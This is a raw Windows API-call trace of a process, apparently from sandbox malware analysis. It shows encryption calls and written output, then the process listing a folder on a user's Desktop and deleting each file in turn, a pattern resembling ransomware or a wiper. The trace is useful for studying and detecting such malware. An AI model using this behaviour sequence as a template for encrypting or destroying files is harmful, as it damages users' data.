1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0090.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0090.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ce8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.912] CryptEncrypt (in: hKey=0x9a3e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0090.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.912] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0090.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.912] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.912] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.913] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.913] CryptEncrypt (in: hKey=0x9a3e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ab8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ab8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.913] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.913] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.913] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.913] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.913] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.913] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.914] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.914] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.914] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.914] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.914] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.914] WriteFile (in: hFile=0x294, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0090.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.918] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0090.918] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.918] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0090.918] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.918] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.918] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.918] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.918] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.918] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.918] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9bf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.919] CryptDestroyKey (hKey=0x9a3e80) returned 1 [0090.919] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.919] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.919] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.919] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.919] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.919] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.919] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.919] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.919] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.919] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.919] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.919] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.919] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.919] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.919] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.919] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.919] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.919] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.920] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.920] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.920] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.920] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.920] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.920] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.920] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7040, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.920] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0090.920] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.920] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.920] FreeLibrary (hLibModule=0x76390000) returned 1 [0090.920] CloseHandle (hObject=0x294) returned 1 [0090.922] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.922] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6108 [0090.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0090.922] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ED 0nXQ VIkUvYr6", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6", lpFilePart=0x8cedf4*="ED 0nXQ VIkUvYr6") returned 0x28 [0090.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fba0 | out: hHeap=0x2af0000) returned 1 [0090.922] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6")) returned 0x10 [0090.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9a4140 [0090.922] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0090.922] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a026230, ftCreationTime.dwHighDateTime=0x1d5c8dc, ftLastAccessTime.dwLowDateTime=0xce447400, ftLastAccessTime.dwHighDateTime=0x1d5d6f2, ftLastWriteTime.dwLowDateTime=0xce447400, ftLastWriteTime.dwHighDateTime=0x1d5d6f2, nFileSizeHigh=0x0, nFileSizeLow=0x619e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5E4_Kcg6cqpR-gwb.swf", cAlternateFileName="5E4_KC~1.SWF")) returned 1 [0090.922] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\5E4_Kcg6cqpR-gwb.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\5e4_kcg6cqpr-gwb.swf")) returned 1 [0090.923] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccb40900, ftCreationTime.dwHighDateTime=0x1d5d73f, ftLastAccessTime.dwLowDateTime=0xdb0cc290, ftLastAccessTime.dwHighDateTime=0x1d5d0cc, ftLastWriteTime.dwLowDateTime=0xdb0cc290, ftLastWriteTime.dwHighDateTime=0x1d5d0cc, nFileSizeHigh=0x0, nFileSizeLow=0x15772, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="6xiRzqk0e.mp3", cAlternateFileName="6XIRZQ~1.MP3")) returned 1 [0090.923] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\6xiRzqk0e.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\6xirzqk0e.mp3")) returned 1 [0090.924] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01d96e0, ftCreationTime.dwHighDateTime=0x1d5d6ea, ftLastAccessTime.dwLowDateTime=0x726bd8e0, ftLastAccessTime.dwHighDateTime=0x1d5c85a, ftLastWriteTime.dwLowDateTime=0x726bd8e0, ftLastWriteTime.dwHighDateTime=0x1d5c85a, nFileSizeHigh=0x0, nFileSizeLow=0xbe65, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="FisMdRNWBNOEJ4Av.swf", cAlternateFileName="FISMDR~1.SWF")) returned 1 [0090.924] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\FisMdRNWBNOEJ4Av.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\fismdrnwbnoej4av.swf")) returned 1 [0090.925] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7febd840, ftCreationTime.dwHighDateTime=0x1d5d678, ftLastAccessTime.dwLowDateTime=0x2be003f0, ftLastAccessTime.dwHighDateTime=0x1d5d729, ftLastWriteTime.dwLowDateTime=0x2be003f0, ftLastWriteTime.dwHighDateTime=0x1d5d729, nFileSizeHigh=0x0, nFileSizeLow=0x7812, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="JFBPLC7ZEPj.ppt", cAlternateFileName="JFBPLC~1.PPT")) returned 1 [0090.925] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\JFBPLC7ZEPj.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\jfbplc7zepj.ppt")) returned 1 [0090.926] FindNextFileW (in: hFindFile=0x9a4140, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd50430, ftCreationTime.dwHighDateTime=0x1d5d21c, ftLastAccessTime.dwLowDateTime=0xf6f6dab0, ftLastAccessTime.dwHighDateTime=0x1d5ce31, ftLastWriteTime.dwLowDateTime=0xf6f6dab0, ftLastWriteTime.dwHighDateTime=0x1d5ce31, nFileSizeHigh=0x0, nFileSizeLow=0x42b4, 